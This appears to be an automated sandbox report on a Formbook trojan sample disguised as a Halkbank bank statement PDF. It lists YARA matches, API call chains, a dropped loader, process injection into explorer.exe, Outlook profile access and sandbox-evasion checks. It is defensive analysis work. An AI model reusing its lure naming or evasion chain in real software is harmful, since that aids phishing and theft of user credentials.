          Source: 3.2.dlcmto.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.dlcmto.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.dlcmto.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.dlcmto.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.297238970.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.297238970.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.297682899.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.297682899.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.517154599.0000000004450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.517154599.0000000004450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.297724728.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.297724728.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.515846426.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.515846426.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.517245778.0000000004480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.517245778.0000000004480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 3.2.dlcmto.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.dlcmto.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.dlcmto.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.dlcmto.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.297238970.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.297238970.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.297682899.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.297682899.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.517154599.0000000004450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.517154599.0000000004450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.297724728.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.297724728.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.515846426.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.515846426.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.517245778.0000000004480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.517245778.0000000004480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00406D5F0_2_00406D5F
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 1_2_0119EDCC1_2_0119EDCC
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 1_2_009F08B71_2_009F08B7
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 1_2_009F0A1F1_2_009F0A1F
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_004058033_2_00405803
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_004038833_2_00403883
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_00401B603_2_00401B60
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_00421B3F3_2_00421B3F
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_00401C703_2_00401C70
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_004055E23_2_004055E2
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_004055E33_2_004055E3
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_004206D33_2_004206D3
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_004017C03_2_004017C0
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_0040BFCE3_2_0040BFCE
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_0040BFD33_2_0040BFD3
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_0040BF8D3_2_0040BF8D
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_004017B33_2_004017B3
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_0119EDCC3_2_0119EDCC
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: String function: 01195457 appears 40 times
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: String function: 01191D00 appears 72 times
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_0041E5F3 NtCreateFile,3_2_0041E5F3
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_0041E6A3 NtReadFile,3_2_0041E6A3
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_0041E723 NtClose,3_2_0041E723
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_0041E7D3 NtAllocateVirtualMemory,3_2_0041E7D3
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_0041E5ED NtCreateFile,3_2_0041E5ED
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_0041E69D NtReadFile,3_2_0041E69D
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_0041E7CD NtAllocateVirtualMemory,3_2_0041E7CD
          Source: Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeReversingLabs: Detection: 30%
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeFile read: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeJump to behavior
          Source: Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeProcess created: C:\Users\user\AppData\Local\Temp\dlcmto.exe "C:\Users\user\AppData\Local\Temp\dlcmto.exe" C:\Users\user\AppData\Local\Temp\osqafruepl.xf
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeProcess created: C:\Users\user\AppData\Local\Temp\dlcmto.exe C:\Users\user\AppData\Local\Temp\dlcmto.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeProcess created: C:\Users\user\AppData\Local\Temp\dlcmto.exe "C:\Users\user\AppData\Local\Temp\dlcmto.exe" C:\Users\user\AppData\Local\Temp\osqafruepl.xfJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeProcess created: C:\Users\user\AppData\Local\Temp\dlcmto.exe C:\Users\user\AppData\Local\Temp\dlcmto.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\statecache.lockJump to behavior
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeFile created: C:\Users\user\AppData\Local\Temp\nsh9333.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@12/5@5/2
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404AB5
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3268:120:WilError_01
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: explorer.pdbUGP source: dlcmto.exe, 00000003.00000002.298566027.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, dlcmto.exe, 00000003.00000003.295506856.0000000003001000.00000004.00000020.00020000.00000000.sdmp, dlcmto.exe, 00000003.00000003.294435514.0000000002C80000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\xampp\htdocs\033f3715fd5f4d1cb9aa179eaa7531bc\Loader\Release\Loader.pdb source: Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe, 00000000.00000002.259315149.0000000002877000.00000004.00000020.00020000.00000000.sdmp, Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe, 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmp, dlcmto.exe, 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmp, dlcmto.exe, 00000001.00000000.248339390.00000000011A0000.00000002.00000001.01000000.00000004.sdmp, dlcmto.exe, 00000003.00000002.297879282.00000000011A0000.00000002.00000001.01000000.00000004.sdmp, explorer.exe, 00000009.00000002.518882230.0000000004B23000.00000004.10000000.00040000.00000000.sdmp, nsh9334.tmp.0.dr, dlcmto.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: dlcmto.exe, 00000001.00000003.252021778.000000001A7D0000.00000004.00001000.00020000.00000000.sdmp, dlcmto.exe, 00000001.00000003.252292362.000000001A960000.00000004.00001000.00020000.00000000.sdmp, dlcmto.exe, 00000003.00000002.297907577.00000000012CF000.00000040.00001000.00020000.00000000.sdmp, dlcmto.exe, 00000003.00000003.255304096.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp, dlcmto.exe, 00000003.00000003.253006768.0000000000E03000.00000004.00000020.00020000.00000000.sdmp, dlcmto.exe, 00000003.00000002.297907577.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.299557903.0000000004644000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.297581273.0000000004456000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.517484627.00000000048FF000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.517484627.00000000047E0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: dlcmto.exe, 00000001.00000003.252021778.000000001A7D0000.00000004.00001000.00020000.00000000.sdmp, dlcmto.exe, 00000001.00000003.252292362.000000001A960000.00000004.00001000.00020000.00000000.sdmp, dlcmto.exe, 00000003.00000002.297907577.00000000012CF000.00000040.00001000.00020000.00000000.sdmp, dlcmto.exe, 00000003.00000003.255304096.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp, dlcmto.exe, 00000003.00000003.253006768.0000000000E03000.00000004.00000020.00020000.00000000.sdmp, dlcmto.exe, 00000003.00000002.297907577.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.299557903.0000000004644000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.297581273.0000000004456000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.517484627.00000000048FF000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.517484627.00000000047E0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: explorer.pdb source: dlcmto.exe, 00000003.00000002.298566027.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, dlcmto.exe, 00000003.00000003.295506856.0000000003001000.00000004.00000020.00020000.00000000.sdmp, dlcmto.exe, 00000003.00000003.294435514.0000000002C80000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_00407033 push ds; retf 3_2_00407034
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_0041B377 pushad ; iretd 3_2_0041B378
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_0041B379 push eax; iretd 3_2_0041B37A
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_00403444 push ebp; ret 3_2_00403450
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_004055DA push ecx; ret 3_2_004055E1
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_004105E3 push esi; iretd 3_2_004105ED
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_00401DB0 push eax; ret 3_2_00401DB2
          Source: dlcmto.exe.0.drStatic PE information: section name: .00cfg
          Source: dlcmto.exe.0.drStatic PE information: section name: .voltbl
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeFile created: C:\Users\user\AppData\Local\Temp\dlcmto.exeJump to dropped file
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
          Source: C:\Windows\SysWOW64\explorer.exe TID: 3416Thread sleep time: -48000s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 863Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 884Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeAPI coverage: 4.9 %
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 1_2_009F07DA GetSystemInfo,1_2_009F07DA
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 1_2_01197D84 FindFirstFileExW,_free,FindNextFileW,_free,FindClose,_free,1_2_01197D84
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 1_2_01197CD3 _free,_free,FindFirstFileExW,_free,1_2_01197CD3
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_01197D84 FindFirstFileExW,_free,FindNextFileW,_free,FindClose,_free,3_2_01197D84
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_01197CD3 _free,_free,FindFirstFileExW,_free,3_2_01197CD3
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeAPI call chain: ExitProcess graph end nodegraph_0-3480
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeAPI call chain: ExitProcess graph end node
          Source: explorer.exe, 00000004.00000002.524345410.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
          Source: explorer.exe, 00000004.00000003.476169113.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.524345410.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW\A%SystemRoot%\system32\mswsock.dllts\AppTiles\StoreBadgeLogo.pngU
          Source: explorer.exe, 00000004.00000003.475534026.000000000F2C3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.477026590.000000000F305000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.526542951.000000000F306000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
